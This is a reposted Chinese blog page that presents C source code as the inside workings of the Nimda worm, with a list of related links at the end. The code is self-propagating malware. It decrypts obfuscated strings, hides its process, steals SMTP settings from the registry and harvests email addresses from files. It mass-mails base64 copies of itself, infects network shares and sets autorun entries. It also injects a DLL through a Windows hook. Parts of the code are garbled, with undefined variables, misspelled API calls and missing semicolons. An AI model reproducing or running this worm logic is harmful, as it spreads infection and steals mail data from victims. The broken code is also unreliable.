Nimda程式設計內幕 (轉)
void WIN worm()
long w0rm_ThreadCodeList[ 3] = {
( long) L0calThread,
( long) Rem0teThread,
( long) Thread
} ;
char *StrArray[ 66] = {
szCopyRight,
szFakeMsg,
szSetUp,
szOpenEnumA,
szWNetCloseEnum,
szWNetEnumReA,
szMPR_DLL,
szWINSOCK_DLL,
szWtartup,
szinet_addr,
szgethostbyaddr,
szgethostbyname,
szhtons,
szsocket,
szconnect,
szsend,
szrecv,
szclosesocket,
szWSACleanup,
smtp_str00,
smtp_str01,
smtp_str02,
smtp_str03,
smtp_str06,
smtp_str07,
smtp_str08,
smtp_str09,
smtp_str0B,
smtp_str0C,
smtp_str0D,
smtp_str0E,
smtp_str0F,
smtp_newline,
smtp_separator,
szWindir00,
szWindir01,
szWindir02,
szWindir03,
szWindir04,
szWIN_INI,
szSETUP_EXE,
szSYSTEM_EXE,
szADVAPI_DLL,
szRegOpenKeyExA,
szRegQueryValueExA,
szRegCloseKey,
szAccountManager,
szDefaultMail,
szAccounts,
szSMTPserver,
szSMTP,
szExt00,
szExt01,
szExt02,
szExt03,
szExt04,
szExt05,
szExt06,
sz,
szCute,
szInternetExplorer,
sz,
szMirc,
szRegisterServiceProcess,
szKernel32,
szTempFile
} ;
static HANDLE w0rm_hThreadList[ 3] ;
D w0rm_ThreadIDList[ 3] ;
char szModule[ MAX_PATH] ;
char *Param ;
int count ;
int min_threads ;
int max_threads ;
BOOL re_generation ;
MailDone = FALSE ;
for ( count = 0 ; count < 66 ; count++ ) DecryptStr( StrArray[ count]) ;
GetModuleFileNameA( NULL, szModule, MAX_PATH) ;
Param = szModule ;
while( *Param != 0) Param++ ;
Param -= 5 ;
if (( *Param == 'P') || ( *Param == 'p'))
{
MessageBox( NULL,
szFakeMsg,
szSetUp,
MB_OK | MB_ICONSTOP) ;
re_generation = FALSE ;
max_threads = 1 ;
}
else
{
if ( ( hKERNEL32 = GetModuleHandleA( szKernel32)) != NULL)
{
if ( ( a_RegisterServiceProcess = GetProcAddress( hKERNEL32, szRegisterServiceProcess)) != NULL)
{
a_RegisterServiceProcess ( GetCurrentProcessId(), 1) ;
}
}
re_generation = TRUE ;
max_threads = 3 ;
}
min_threads = 0 ;
do
{
for ( count = min_threads ; count < max_threads ; count++ )
{
w0rm_hThreadList[ count] = CreateThread( NULL,
0,
( LPTHREAD_START_ROUTINE) w0rm_ThreadCodeList[ count],
NULL,
0,
&w0rm_ThreadIDList[ count]) ;
}
for ( count = min_threads ; count < max_threads ; count++ )
{
if ( w0rm_hThreadList[ count] != NULL)
{
WaitForSingle( w0rm_hThreadList[ count], INFINITE) ;
CloseHandle ( w0rm_hThreadList[ count]) ;
}
}
if ( MailDone)
{
GetDirectoryA( szModule, MAX_PATH) ;
strcat( szModule, szWIN_INI) ;
WritePrivateProfileStringA( szWindir00, "run", "", szModule) ;
re_generation = FALSE ;
}
min_threads = 1 ;
if ( re_generation) Sleep( 0x000FFFFF) ;
} while( re_generation) ;
return 0 ;
}
long WINAPI MailThread(long lParam)
{
unsigned int addr ;
struct sockaddr_in server ;
struct hostent *hp ;
WSADATA wsaData ;
HANDLE hFile ;
HANDLE hMap ;
char enc0de_filename[ MAX_PATH] ;
char ShortBuff[ 512] ;
char szSIGN[ 512] ;
char szHELO[ 512] ;
BOOL Success ;
void *lpFile ;
int StrCount ;
int FileSize ;
typedef struct
{
char *Command ;
BOOL WaitReply ;
}
SMTPstr ;
SMTPstr SMTPstrings00[ 2] = { szHELO, TRUE ,
szMAIL_FROM, TRUE } ;
SMTPstr SMTPstrings01[ 11] = { smtp_str03, TRUE ,
szMAIL_FROM+5, FALSE ,
smtp_str06, FALSE ,
smtp_str07, FALSE ,
smtp_separator, FALSE ,
smtp_str08, FALSE ,
smtp_separator, FALSE ,
smtp_str09, FALSE ,
szSIGN, FALSE ,
smtp_separator, FALSE ,
smtp_str0B, FALSE } ;
SMTPstr SMTPstrings02[ 6] = { smtp_str0C, FALSE ,
smtp_separator, FALSE ,
smtp_str0D, FALSE ,
smtp_newline, FALSE ,
smtp_str0E, TRUE,
smtp_str0F, FALSE } ;
WaitC0nnected() ;
if ( !GetSMTP( szSMTPname, szSMTPaddr)) return 0 ;
sprintf( szHELO, "%s %sn", smtp_str00, szSMTPname) ;
sprintf( szMAIL_FROM, "%s n", smtp_str01, szSMTPaddr) ;
sprintf( szSIGN,"n:)nn----n%snn--", szSMTPaddr) ;
if ( ( hWINSOCK = LoadLibraryA( szWINSOCK_DLL)) == NULL) return 0 ;
a_WSAStartup = ( FROC) GetProcAddress( hWINSOCK, szWSAStartup) ;
a_inet_addr = ( FARPROC) GetProcAddress( hWINSOCK, szinet_addr) ;
a_gethostbyaddr = ( FARPROC) GetProcAddress( hWINSOCK, szgethostbyaddr) ;
a_gethostbyname = ( FARPROC) GetProcAddress( hWINSOCK, szgethostbyname) ;
a_htons = ( FARPROC) GetProcAddress( hWINSOCK, szhtons) ;
a_socket = ( FARPROC) GetProcAddress( hWINSOCK, szsocket) ;
a_connect = ( FARPROC) GetProcAddress( hWINSOCK, szconnect) ;
a_send = ( FARPROC) GetProcAddress( hWINSOCK, szsend) ;
a_recv = ( FARPROC) GetProcAddress( hWINSOCK, szrecv) ;
a_closesocket = ( FARPROC) GetProcAddress( hWINSOCK, szclosesocket) ;
a_WSACleanup = ( FARPROC) GetProcAddress( hWINSOCK, szWSACleanup) ;
if ( ( a_WSAStartup == NULL) ||
( a_inet_addr == NULL) ||
( a_gethostbyaddr == NULL) ||
( a_gethostbyname == NULL) ||
( a_htons == NULL) ||
( a_socket == NULL) ||
( a_connect == NULL) ||
( a_send == NULL) ||
( a_recv == NULL) ||
( a_closesocket == NULL) ||
( a_WSACleanup == NULL))
{
FreeLibrary( hWINSOCK) ;
return 0 ;
}
if ( a_WSAStartup( 0x0001, &wsaData) == SOCKET_ERROR)
{
FreeLibrary( hWINSOCK) ;
return 0 ;
}
if ( isalpha( ( int) szSMTPserver[ 0]))
{
hp = ( struct hostent *) a_gethostbyname( szSMTPname) ;
}
else
{
addr = a_inet_addr( szSMTPname) ;
hp = ( struct hostent *) a_gethostbyaddr( (char *)&addr, 4, AF_INET) ;
}
if ( hp == NULL)
{
a_WSACleanup() ;
FreeLibrary( hWINSOCK) ;
return 0 ;
}
memset( &server, 0, sizeof( server)) ;
memcpy( &server.sin_addr, hp->h_addr, hp->h_length) ;
server.sin_family = hp->h_addrtype ;
server.sin_port = a_htons( 25) ;
conn_socket = a_socket( AF_INET, SOCK_STREAM, 0) ;
if ( conn_socket < 0 )
{
a_WSACleanup() ;
FreeLibrary( hWINSOCK) ;
return 0 ;
}
if ( a_connect( conn_socket, (struct sockaddr *) &server, sizeof( server)) == SOCKET_ERROR)
{
a_closesocket( conn_socket) ;
a_WSACleanup() ;
FreeLibrary( hWINSOCK) ;
}
a_recv( conn_socket, ShortBuff, sizeof ( ShortBuff),0 ) ;
for ( StrCount = 0 ; StrCount < 2 ; StrCount++ )
{
Success = str2socket( SMTPstrings00[ StrCount].Command, SMTPstrings00[ StrCount].WaitReply) ;
if ( !Success) break ;
}
if ( Success)
{
Found = 0 ;
GetWindowsDirectoryA( enc0de_filename, MAX_PATH) ;
enc0de_filename[ 3] = 0 ;
FindPe0ple( enc0de_filename) ;
for ( StrCount = 0 ; StrCount < 11 ; StrCount++ )
{
Success = str2socket( SMTPstrings01[ StrCount].Command, SMTPstrings01[ StrCount].WaitReply) ;
if ( !Success) break ;
}
if ( Success)
{
GetModuleFileNameA( NULL, ShortBuff, MAX_PATH) ;
GetTempPathA( MAX_PATH, enc0de_filename) ;
strcat( enc0de_filename, szTempFile) ;
if ( CopyFileA( ShortBuff, enc0de_filename, FALSE) != 0)
{
if ( ( hFile = CreateFileA( enc0de_filename,
GENERIC_READ,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL)) != INVALID_HANDLE_VALUE)
{
FileSize = GetFileSize( hFile, NULL) ;
if ( ( FileSize != 0xFFFFFFFF) && ( FileSize != 0))
{
if ( ( hMap = CreateFileMapA( hFile,
NULL,
PAGE_READONLY | PAGE_WRITECOPY,
0,
FileSize,
NULL)) != NULL)
{
if ( ( lpFile = MapViewOfFile( hMap,
FILE_MAP_READ,
0,
0,
FileSize)) != NULL)
{
base64_encode( lpFile, FileSize) ;
for ( StrCount = 0 ; StrCount < 6 ; StrCount++ )
{
if ( ( Success = str2socket( SMTPstrings02[ StrCount].Command,
SMTPstrings02[ StrCount].WaitReply)) == FALSE) break ;
}
if ( Success) MailDone = TRUE ;
UnmapViewOfFile( lpFile) ;
}
CloseHandle( hMap) ;
}
}
CloseHandle( hFile) ;
}
DeleteFileA( enc0de_filename) ;
}
}
}
a_closesocket( conn_socket) ;
a_WSACleanup() ;
FreeLibrary( hWINSOCK) ;
return 0 ;
}
//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?
void NetW0ng( LPNETRESOURCE lpnr)
{
LPNETRESOURCE lpnrLocal ;
HANDLE hEnum ;
int count ;
int cEntries = 0xFFFFFFFF ;
DWORD dwResult ;
DWORD cbBuffer = 32768 ;
if ( a_WNetOpenEnum ( RESOURCE_CONNECTED,
RESOURCETYPE_ANY,
0,
lpnr,
&hEnum) != NO_ERROR) return ;
do
{
lpnrLocal = ( LPNETRESOURCE) GlobalAlloc( GPTR, cbBuffer) ;
dwResult = a_WNetEnumResource( hEnum,
&cEntries,
lpnrLocal,
&cbBuffer) ;
if ( dwResult == NO_ERROR)
{
for ( count = 1 ; count < cEntries ; count++ )
{
if ( lpnrLocal[ count].dwUsage & RESOURCEUSAGE_CONTAINER)
{
NetW0rming( &lpnrLocal[ count]) ;
}
else if ( lpnrLocal[ count].dwType = RESOURCETYPE_DISK)
{
Rem0teInfecti0n( lpnrLocal[ count].lpRemoteName) ;
}
}
}
else if (dwResult != ERROR_NO_MORE_ITEMS) break ;
} while ( dwResult != ERROR_NO_MORE_ITEMS) ;
GlobalFree ( ( HGLOBAL) lpnrLocal) ;
a_WNetCloseEnum( hEnum) ;
return ;
}
//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?
void Rem0teInfecti0n( char *szPath)
{
char *dir_name[ 5]= { szWindir00, szWindir01, szWindir02, szWindir03, szWindir04 } ;
_FIND_DATAA FindData ;
HANDLE hFind ;
char szLookUp[ MAX_PATH] ;
char w0rm0rg[ MAX_PATH] ;
char w0rmD3st[ MAX_PATH] ;
int aux ;
for ( aux = 0 ; aux < 5 ; aux++ )
{
sprintf ( szLookUp, "%s%s%s", szPath, dir_name[ aux], szWIN_INI) ;
if ( ( hFind = FindFirstFileA( szLookUp, ( LPWIN32_FIND_DATAA) &FindData)) != INVALID_HANDLE_VALUE)
{
sprintf( w0rmD3st, "%s%s%s", szPath, dir_name[ aux], szSYSTEM_EXE) ;
if ( GetModuleFileNameA( NULL, w0rm0rg, MAX_PATH) != 0)
{
if ( CopyFileA( w0rm0rg, w0rmD3st, TRUE) != 0)
{
WritePrivateProfileStringA( szWindir00, "run", szSYSTEM_EXE, szLookUp) ;
FindClose ( hFind) ;
break ;
}
}
FindClose ( hFind) ;
}
}
}
//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?
BOOL str2socket( char *msg, BOOL do_recv)
{
int retval ;
char Buffer[ 256];
/* Code used to de the wo
if ( do_recv)
{
if ( MessageBox( NULL,
msg,
"send() this string ?",
MB_YESNO | MB_ICONQUESTION) == IDNO) return TRUE ;
}
*/
if ( a_send( conn_socket, msg, strlen( msg), 0) == SOCKET_ERROR)
{
a_WSACleanup() ;
return FALSE ;
}
if ( do_recv)
{
retval = a_recv( conn_socket, Buffer, sizeof ( Buffer),0 ) ;
if ( ( retval == SOCKET_ERROR) || ( retval == 0))
{
a_closesocket( conn_socket) ;
a_WSACleanup() ;
return FALSE ;
}
Buffer[ retval] = 0 ;
/* Code used to debug the worm
MessageBox( NULL,
Buffer,
"recv()",
MB_OK | MB_ICONSTOP) ;
*/
}
return TRUE ;
}
//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?
BOOL GetSMTP( char *dest, char *org_email)
{
char szKeyName[ MAX_PATH] ;
char szRes[ MAX_PATH] ;
char *move2low ;
int size ;
HKEY hKey ;
if ( ( hADVAPI = LoadLibraryA( szADVAPI_DLL)) == NULL) return FALSE ;
a_RegOpenKeyExA = ( FARPROC) GetProcAddress( hADVAPI, szRegOpenKeyExA) ;
a_RegQueryValueExA = ( FARPROC) GetProcAddress( hADVAPI, szRegQueryValueExA) ;
a_RegCloseKey = ( FARPROC) GetProcAddress( hADVAPI, szRegCloseKey) ;
if ( ( a_RegOpenKeyExA == NULL) ||
( a_RegQueryValueExA == NULL) ||
( a_RegCloseKey == NULL))
{
FreeLibrary( hADVAPI) ;
return FALSE ;
}
strcpy( szKeyName, szAccountManager) ;
if ( a_RegOpenKeyExA( HKEY_CURRENT_USER,
szKeyName,
0,
KEY_QUERY_VALUE,
&hKey) != ERROR_SUCCESS)
{
FreeLibrary( hADVAPI) ;
return FALSE ;
}
size = 64 ;
if ( a_RegQueryValueExA( hKey,
szDefaultMail,
0,
NULL,
szRes,
&size) != ERROR_SUCCESS)
{
a_RegCloseKey( hKey) ;
FreeLibrary( hADVAPI) ;
return FALSE ;
}
a_RegCloseKey( hKey) ;
strcat( szKeyName, szAccounts) ;
strcat( szKeyName, szRes) ;
if ( a_RegOpenKeyExA( HKEY_CURRENT_USER,
szKeyName,
0,
KEY_QUERY_VALUE,
&hKey) != ERROR_SUCCESS)
{
FreeLibrary( hADVAPI) ;
return FALSE ;
}
size = 64 ;
if ( a_RegQueryValueExA( hKey,
szSMTPserver,
0,
NULL,
dest,
&size) != ERROR_SUCCESS)
{
a_RegCloseKey( hKey) ;
FreeLibrary( hADVAPI) ;
return FALSE ;
}
size = 64 ;
if ( a_RegQueryValueExA( hKey,
szSMTPemail,
0,
NULL,
org_email,
&size) != ERROR_SUCCESS)
{
a_RegCloseKey( hKey) ;
FreeLibrary( hADVAPI) ;
return FALSE ;
}
a_RegCloseKey( hKey) ;
move2low = org_email ;
while( *move2low != 0)
{
if ( ( *move2low > 64) && ( *move2low < 91)) *move2low = ( char) (* move2low) - 65 + 97 ;
move2low++ ;
}
FreeLibrary( hADVAPI) ;
return TRUE ;
}
//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?
void base64_encode(const void *buf, int size)
{
char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" ;
char ok_base64[ 80] ;
char *p = ok_base64 ;
unsigned char *q = ( unsigned char *) buf ;
int i ;
int c ;
int l ;
BOOL SendRes ;
i = l = 0 ;
while( i < size)
{
c = q[ i++] ;
c *= 256 ;
if( i < size) c += q[ i] ;
i++ ;
c *= 256 ;
if( i < size) c += q[ i] ;
i++ ;
p[ 0] = base64[ ( c & 0x00fc0000) >> 18] ;
p[ 1] = base64[ ( c & 0x0003f000) >> 12] ;
p[ 2] = base64[ ( c & 0x00000fc0) >> 6] ;
p[ 3] = base64[ ( c & 0x0000003f) >> 0] ;
if( i > size) p[ 3] = '=' ;
if( i > size + 1) p[ 2] = '=' ;
p += 4 ;
l += 1 ;
if ( l == 0x013)
{
ok_base64[ 0x04C] = 0x0A ;
ok_base64[ 0x04D] = 0 ;
if ( ( SendRes = str2socket( ok_base64, FALSE)) == FALSE) break ;
p = ok_base64 ;
l = 0;
}
}
if ( SendRes != FALSE)
{
if ( l != 0)
{
ok_base64[ l*4] = 0x0A ;
ok_base64[ l*4] = 0 ;
str2socket( ok_base64, FALSE) ;
}
}
}
//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?
char *DecryptStr( char *DcrStr)
{
char *p= DcrStr ;
while( *pos != 0)
{
*pos ^= ( char) 0x0FF ;
pos++ ;
}
return DcrStr ;
}
//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?
void FindPe0ple( char *szPath)
{
char szRecursive[ MAX_PATH] ;
char szCurrentDir[ MAX_PATH] ;
char FileExt[ MAX_PATH] ;
char RCPT_TO[ MAX_PATH] ;
WIN32_FIND_DATAA FindData ;
HANDLE hFind ;
HANDLE hFile ;
HANDLE hMap ;
void *lpFile ;
char *lpc01 ;
char *lpc02 ;
char *lpc03 ;
char *lpc04 ;
char auxchar ;
int l00king ;
int addrssize ;
GetCurrentDirectoryA( MAX_PATH, szCurrentDir) ;
if ( SetCurrentDirectoryA( szPath) == FALSE) return ;
hFind = (HANDLE) FindFirstFileA( "*.*", (LPWIN32_FIND_DATAA) &FindData) ;
if ( hFind != INVALID_HANDLE_VALUE)
{
do
{
if ( ( FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && ( FindData.cFileName[0] != '.'))
{
strcpy (szRecursive,szPath) ;
strcat (szRecursive,FindData.cFileName) ;
strcat (szRecursive,"") ;
FindPe0ple( szRecursive) ;
}
else if ( ( FindData.nFileSizeHigh == 0) && ( FindData.nFileSizeLow > 16) && ( !( FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && ( FindData.cFileName[0] != '.')))
{
lpc01 = FindData.cFileName ;
lpc02 = NULL ;
while ( *lpc01 != 0)
{
if ( *lpc01 == 46) lpc02 = lpc01 ;
lpc01++ ;
}
lpc01 = FileExt ;
if ( lpc02 != NULL)
{
while ( *lpc02 != 0)
{
if ( ( *lpc02 > 97) && ( *lpc02 < 123)) *lpc01 = ( char) ( *lpc02 - 97 + 65) ;
else *lpc01 = *lpc02 ;
lpc01++ ;
lpc02++ ;
}
FileExt[ 4] = 0 ;
if ( ( strcmp( FileExt, szExt00) == 0) ||
( strcmp( FileExt, szExt01) == 0) ||
( strcmp( FileExt, szExt02) == 0) ||
( strcmp( FileExt, szExt03) == 0) ||
( strcmp( FileExt, szExt04) == 0) ||
( strcmp( FileExt, szExt05) == 0) ||
( strcmp( FileExt, szExt06) == 0))
{
if ( ( hFile = CreateFileA( FindData.cFileName,
GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL)) != INVALID_HANDLE_VALUE)
{
if ( ( hMap = CreateFileMappingA( hFile,
NULL,
PAGE_READONLY,
0,
FindData.nFileSizeLow,
NULL)) != NULL)
{
if ( ( lpFile = MapViewOfFile( hMap,
FILE_MAP_READ,
0,
0,
FindData.nFileSizeLow)) != NULL)
{
lpc01 = lpFile ;
addrssize = FindData.nFileSizeLow ;
l00king = 0 ;
while( ( addrssize > 16) && ( Found < 16))
{
if ( *lpc01 == 60)
{
l00king = 1 ;
lpc02 = lpc01 ;
}
if ( ( *lpc01 == 64) && ( l00king == 1))
{
l00king = 2 ;
}
if ( ( *lpc01 == 62) && ( l00king == 2))
{
lpc03 = szSMTPaddr ;
lpc04 = lpc02 + 1 ;
while ( *lpc03 != 0)
{
auxchar = *lpc04 ;
if ( ( auxchar > 64) && ( auxchar < 91)) auxchar = auxchar - 65 + 97 ;
if ( *lpc03 != auxchar)
{
l00king = 0 ;
break ;
}
lpc03++ ;
lpc04++ ;
}
if ( l00king == 0)
{
strcpy( RCPT_TO, smtp_str02) ;
lpc03 = RCPT_TO + 9 ;
while ( *lpc02 != 62)
{
*lpc03 = *lpc02 ;
lpc02++ ;
lpc03++ ;
}
*lpc03 = 62 ;
lpc03++ ;
*lpc03 = 0 ;
strcat( RCPT_TO, "n") ;
str2socket( RCPT_TO, TRUE) ;
Found++ ;
}
else l00king = 0 ;
}
if ( ( *lpc01 < 64) &&
( *lpc01 != 46) &&
( *lpc01 != 60) &&
( *lpc01 != 62))
{
l00king = 0 ;
}
if ( *lpc01 > 122)
{
l00king = 0 ;
}
lpc01++ ;
addrssize-- ;
}
UnmapViewOfFile( lpFile) ;
}
CloseHandle( hMap) ;
}
CloseHandle( hFile) ;
}
}
}
}
}
while ( ( FindNextFile( hFind, &FindData) !=0) && ( Found < 16)) ;
FindClose( hFind) ;
}
return ;
}
//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?
void WaitC0nnected( void)
{
InetActivated = FALSE ;
while ( !InetActivated)
{
EnumWindows( EnumWindowsProc, ( LPARAM) NULL) ;
Sleep( 0x01770) ;
}
return ;
}
//販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販販?
BOOL CALLBACK EnumWindowsProc( HWND hwnd, LPARAM lParam)
{
int CaptionLen ;
int AwareLen ;
int CompareLen ;
int InetAware ;
int EquChar ;
int aux0 ;
int aux1 ;
char *Foll0w ;
char *PtrAware ;
char WindowCaption[ 1024] ;
CaptionLen = GetWindowText( hwnd, WindowCaption, 1024) ;
if ( CaptionLen > 0)
{
Foll0w = WindowCaption ;
while( *Foll0w != 0)
{
if ( ( *Foll0w >= 'a') && ( *Foll0w <= 'z')) *Foll0w = *Foll0w - 'a' + 'A' ;
Foll0w++ ;
}
for(Aware = 0 ; InetAware < 5 ; InetAware++)
{
AwareLen = strlen( szAware[ InetAware]) ;
if ( AwareLen < CaptionLen)
{
CompareLen = CaptionLen - AwareLen ;
for ( aux0 = 0 ; aux0 < CompareLen ; aux0++ )
{
EquChar = 0 ;
Foll0w = &WindowCaption[ aux0] ;
PtrAware = szAware[ InetAware] ;
for ( aux1 = 0 ; aux1 < AwareLen ; aux1++ , Foll0w++ , PtrAware++ )
{
if ( *Foll0w == *PtrAware) EquChar++ ;
}
if ( EquChar == AwareLen)
{
InetActivated = TRUE ;
break ;
}
aux0++ ;
}
}
}
}
return ( !InetActivated) ;
}
void TFTP32()
{
HANDLE hFile=CreateFile("TFTP32.DLL",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
//printf("nCreate file %s failed:%d",RemoteFilePath,GetLastError());
return -1
}
//寫內容
DWORD i=0,dwIndex=0,dwWrite,dwSize=sizeof(tftpdllbuff)
while(dwSize>dwIndex)
{
if(!WriteFile(hFile,&tftpdllbuff[dwIndex],dwSize-dwIndex,&dwWrite,NULL))
{
//printf("nWrite file %s failed:%d","TFTP32.DLL",GetLastError());
return -1
}
dwIndex+=dwWrite;
}
//關閉檔案控制程式碼
CloseHandle(hFile);
hhook hk
STARTUPINFO si;
PROCESS_INFORMATION pi;
memset(&si,0,sizeof(si));
si.hStdError = si.hStdOutput = wp1;
si.hStdInput = rp2;
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.wShowWindow = SW_H;
si.lpReserved=0;
si.lpReserved2=0;
si.cbReserved2 =0;
si.cb = sizeof(si);
//this two must not
CreateProcess(0, "Explorer.exe", 0, 0, 1, 0, 0, 0, &si, &pi)
Hookproc hkprc
static HINSTANCE hinstDLL
hinstDLL=LoadLibrary((LPCTSTR)"TFTP32.DLL")
hkprc=(HOOKPROC)GetProcAddress(hinstDLL,"hook")
hk=SetWindowsHookEx(WH_CBT,hkprc,HinstDLL,pi.wdthreadID)
FreeLibrary(hinstDLL)
}
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10752043/viewspace-991862/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- 關於螢幕程式設計(轉)程式設計
- Linux開機程式內幕(轉)Linux
- 突發!中興公司程式設計師跳樓自殺,事件內幕......程式設計師事件
- Linux 核心偵錯程式內幕(轉)Linux
- 螢幕取詞核心內幕 (轉)
- 揭秘Linux核心偵錯程式之內幕(轉)Linux
- DDX/DDV工作內幕 (轉)
- 初學程式設計之必備內功(上) (轉)程式設計
- 程式設計師內功心法《設計模式》程式設計師設計模式
- MFC技術內幕簡結 (轉)
- 多程式程式設計 (轉)程式設計
- 多程式程式設計(轉)程式設計
- 內疚的程式設計師程式設計師
- Linux 程式設計之Shell程式設計(轉)Linux程式設計
- Pcap程式設計(轉)PCA程式設計
- shell程式設計(轉)程式設計
- 程式設計之路 (轉)程式設計
- Socket API,CAsyncSocket,CSocket內幕及其用法 (轉)API
- SQL資料庫程式設計大賽開幕SQL資料庫程式設計
- 關於繼承內部類——java程式設計思想示例程式分析; (轉)繼承Java程式設計
- 內推go/php程式設計師GoPHP程式設計師
- 程式設計師的內心需求程式設計師
- 玩轉 PHP 網路程式設計全套之多程式程式設計PHP程式設計
- 高階程式設計師——MySQL技術內幕 InnoDB儲存引擎(4):索引與演算法程式設計師MySql儲存引擎索引演算法
- 《Spring技術內幕》(1) 設計理念和整體架構Spring架構
- Spring技術內幕:設計理念和整體架構概述Spring架構
- Delphi之快速設計(程式設計篇) (轉)程式設計
- EJB 程式設計模型 (轉)程式設計模型
- 魔方遊戲程式設計 (轉)遊戲程式設計
- bash 程式設計指南(轉)程式設計
- 程式設計師轉銷售程式設計師
- TCSHshell程式設計入門(轉)程式設計
- 程式設計資源收集(轉)程式設計
- Excel 的VB程式設計 (轉)Excel程式設計
- 我看程式設計師 (轉)程式設計師
- DirectX 7 程式設計初步 (轉)程式設計
- 程式設計師與MM (轉)程式設計師
- 成功的程式設計師 (轉)程式設計師